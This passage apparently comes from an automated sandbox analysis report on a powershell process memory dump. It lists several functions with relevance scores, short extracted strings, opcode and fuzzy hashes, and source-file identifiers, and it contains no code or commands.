                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 02e21546692a6044e1eac5ff68316722a747e3d7e9c268ab6cb4fe53d47c38a4
                                            • Instruction ID: 75bf8f30302e60eb0932dc7627045de0efd62806bcd881aaa2c82dedfe96f66e
                                            • Opcode Fuzzy Hash: 02e21546692a6044e1eac5ff68316722a747e3d7e9c268ab6cb4fe53d47c38a4
                                            • Instruction Fuzzy Hash: 1261D4F0715306EFDBA48F55D5A17BA77B1AF45311F1880A5EA065B290CB31DE80CBE1
                                            Function 07CF4E48 Relevance: 6.4, Strings: 5, Instructions: 142COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q
                                            • API String ID: 0-170447905
                                            • Opcode ID: 1ccc5c3632f3c7b675bad7c04cf1781eeeabe7b40024509ab16dd3cd9748f495
                                            • Instruction ID: 18cfa008d35f763c6f6570c475bf1fdee2533d06b08c6c7b42a5e97789e952e0
                                            • Opcode Fuzzy Hash: 1ccc5c3632f3c7b675bad7c04cf1781eeeabe7b40024509ab16dd3cd9748f495
                                            • Instruction Fuzzy Hash: 1A416AB5B00346DFDB6C8A6998407ABFBE5EFC5211F19847ADA09C7240DB31CB42C761
                                            Function 07CF1B08 Relevance: 6.4, Strings: 5, Instructions: 138COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q
                                            • API String ID: 0-170447905
                                            • Opcode ID: ee0a6519e78a696c2224a6ec3ee1f93fb710a6d16594d0cf3a7e7a8e908ea50a
                                            • Instruction ID: 0c8c15d2bf55000e2d9ba441f45ea6249e02c7eb522d16e2f056bca3771c647e
                                            • Opcode Fuzzy Hash: ee0a6519e78a696c2224a6ec3ee1f93fb710a6d16594d0cf3a7e7a8e908ea50a
                                            • Instruction Fuzzy Hash: 82416AF170430FCFD7785AAA595137AB7A6AFC5211F2C847ADE418B281EE31C942C391
                                            Function 07CFCC5D Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q$$q
                                            • API String ID: 0-170447905
                                            • Opcode ID: 36c25a10b129d0e3cebfaa06df332f46183ce056ee5f99a63b66fe74b8a11d7d
                                            • Instruction ID: f4156e87423eaeec7ad696dff435aacac1c5d554cdb61ced44dcd8286727ec1d
                                            • Opcode Fuzzy Hash: 36c25a10b129d0e3cebfaa06df332f46183ce056ee5f99a63b66fe74b8a11d7d
                                            • Instruction Fuzzy Hash: DC314BB6B0430FCFDBB54A6794D02BABBE1AFCA211B28447BDA42C7145DA35C501C771
                                            Function 07CFCA06 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$d%q$d%q$d%q$tPq
                                            • API String ID: 0-706544200
                                            • Opcode ID: 0a7864f5c21155a706fddecbf62ccdc97801eedb6ac17c61d36a4cc30e901d2c
                                            • Instruction ID: 2fa16ef3fa875f0ae341fd1b46cece56a5ff432068b6f02904d558c8ceae3998
                                            • Opcode Fuzzy Hash: 0a7864f5c21155a706fddecbf62ccdc97801eedb6ac17c61d36a4cc30e901d2c
                                            • Instruction Fuzzy Hash: 5831E2B4B012099FD778CF55C484A69BBB2FF88710F288999EA05AF350C731ED01CBA1
                                            Function 07CFB110 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$}l$}l
                                            • API String ID: 0-521060526
                                            • Opcode ID: 75d820f1e0fbd61679d6df56d8a19796bc51c2c44087935c419b4796219ae9d3
                                            • Instruction ID: 4c2122e16e9c38fb4cd69cbe3b4593b50f3797eed09967aeb3f4594c535df784
                                            • Opcode Fuzzy Hash: 75d820f1e0fbd61679d6df56d8a19796bc51c2c44087935c419b4796219ae9d3
                                            • Instruction Fuzzy Hash: 3311D3F1300B0A9BEB745D3AD841777B7A7ABC1661F28C02AAA4587280CB31DD41C390
                                            Function 07CFDBD8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XRq$XRq$tPq$$q
                                            • API String ID: 0-1549039314
                                            • Opcode ID: 28dc9acdb0872cb814907979db076b54368b8f58802442e30e8ecb570bc3038e
                                            • Instruction ID: b853ef7fa3b6bc32394b990ac085e5ad91d0c5b953bf7a54ed1757b2453ef54b
                                            • Opcode Fuzzy Hash: 28dc9acdb0872cb814907979db076b54368b8f58802442e30e8ecb570bc3038e
                                            • Instruction Fuzzy Hash: D041A7B0B00205DFDB65CF05C194BA9BBF2EF85711F59C09AE6166B250C771DE81CBA1
                                            Function 07CF0E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 6ded0897851ac74eade7919b94ef0d7a1e1460c5f2b83346e09d511de2a95466
                                            • Instruction ID: 0a3cd070260f15ad7d5b054fd3ea1f81e985b511ce55e855d591a6e4f6f17a66
                                            • Opcode Fuzzy Hash: 6ded0897851ac74eade7919b94ef0d7a1e1460c5f2b83346e09d511de2a95466
                                            • Instruction Fuzzy Hash: 83217DB230030A9BE7B4557AA851767B7D79BC0B11F24843AEB89C7382DE36DD818361
                                            Function 07CF18F0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1602275881.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7cf0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q
                                            • API String ID: 0-3199993180
                                            • Opcode ID: 3338970d468b4684b61451a1045266beb95b467df4b5ae14f976e9614cd74dec
                                            • Instruction ID: 9799aa1d33f571c13755c38ee608844c2ec906a1ab75dbb7010defeee191c9b4
                                            • Opcode Fuzzy Hash: 3338970d468b4684b61451a1045266beb95b467df4b5ae14f976e9614cd74dec
                                            • Instruction Fuzzy Hash: 9D01F2A170934ADFD33A076678653B96FB3AFC3510B1E40ABD541DB242CD158E4AC3A6